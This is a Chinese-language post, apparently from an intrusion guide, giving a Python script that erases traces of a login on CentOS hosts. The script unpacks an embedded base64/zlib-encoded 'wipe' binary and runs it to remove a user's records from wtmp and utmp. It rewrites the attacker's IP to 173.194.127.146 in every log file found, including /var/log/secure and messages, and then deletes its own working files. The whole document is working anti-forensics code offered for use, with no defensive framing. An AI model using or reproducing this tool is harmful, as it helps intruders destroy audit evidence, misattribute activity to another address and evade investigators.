/var/log/wtmp、/var/run/utmp和/var/log/lastlog,这三个二进制文件,修改这三个特殊日志文件工具wipe-1.0,或者下面的 python脚本,使用遍历修改文本文件,然后使用wipe修改那三个二进制文件。脚本使用很简单一共两个参数,-a是必须参数,是你的外网IP=地址,-u可选参数,是你想删除的用户名。
#coding=utf-8
import optparse
import os
import re
import platform
import base64
import zlib
#wipe的数据
myFile = zlib.decompress(base64.decodestring("""
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
ymuVd4N/u2TO/n9T9zgz"""))
def saveWipe():
#该函数用来生成wipe文件
fileObj=open("wipe", "wb")
fileObj.write(myFile)
def makeDir():
#该函数用来新建/tmp/log目录
try:
os.makedirs("/tmp/log")
except:
pass
os.chdir("/tmp/log")
def deleteAllFile(theFolder):
#该函数用来删除/tmp/log目录
if os.path.isfile(theFolder):
try:
os.remove(theFolder)
except:
pass
elif os.path.isdir(theFolder):
for item in os.listdir(theFolder):
fullPath=os.path.join(theFolder, item)
deleteAllFile(fullPath)
try:
os.rmdir(theFolder)
except:
pass
def judgeDistribution():
if platform.linux_distribution()[0] == "CentOS":
return True
else:
exit()
def delTxtLog(theIP):
#删除文本文件中的二进制信息
content=os.popen("find / |grep -vE '/proc'|grep -vE '/sys/module' |grep -vE '/var/lib' |grep -vE /usr/src |grep -vE '/home/'|grep [._]log$ ").readlines()
for each in content:
each=each.rstrip("\n")
shell='sed -i "s/'+theIP+'/173\.194\.127\.146/g" '+each+''
os.system(shell)
shell1='sed -i "s/'+theIP+'/173\.194\.127\.146/g" /var/log/messages'
shell2='sed -i "s/'+theIP+'/173\.194\.127\.146/g" /var/log/secure'
shell3='sed -i "s/'+theIP+'/173\.194\.127\.146/g" /var/log/maillog'
os.system(shell1)
os.system(shell2)
os.system(shell3)
def delBinLog(theIP, theUser):
#接下来删除二进制文件的信息
makeDir()
saveWipe()
os.system("chmod a+x wipe")
wtmpCmd="./wipe w "+theUser
utmpCmd="./wipe u "+theUser
cmd=os.popen("last -1")
content=cmd.read()
pattern=re.compile(theIP)
match=pattern.search(content)
if match:
os.system(wtmpCmd)
os.system(utmpCmd)
os.chdir("/")
deleteAllFile("/tmp/log")
if __name__=="__main__":
parser=optparse.OptionParser()
parser.add_option("-a", dest="address", help="You IP")
parser.add_option("-u", dest="user", help="login name, default:root")
(options, args)=parser.parse_args()
if options.address==None:
print "必须输入IP"
exit()
else:
theIp=options.address
if options.user!=None:
theUser=options.user
else:
theUser="root"
#judgeDistribution()
delTxtLog(theIp)
delBinLog(theIp, theUser)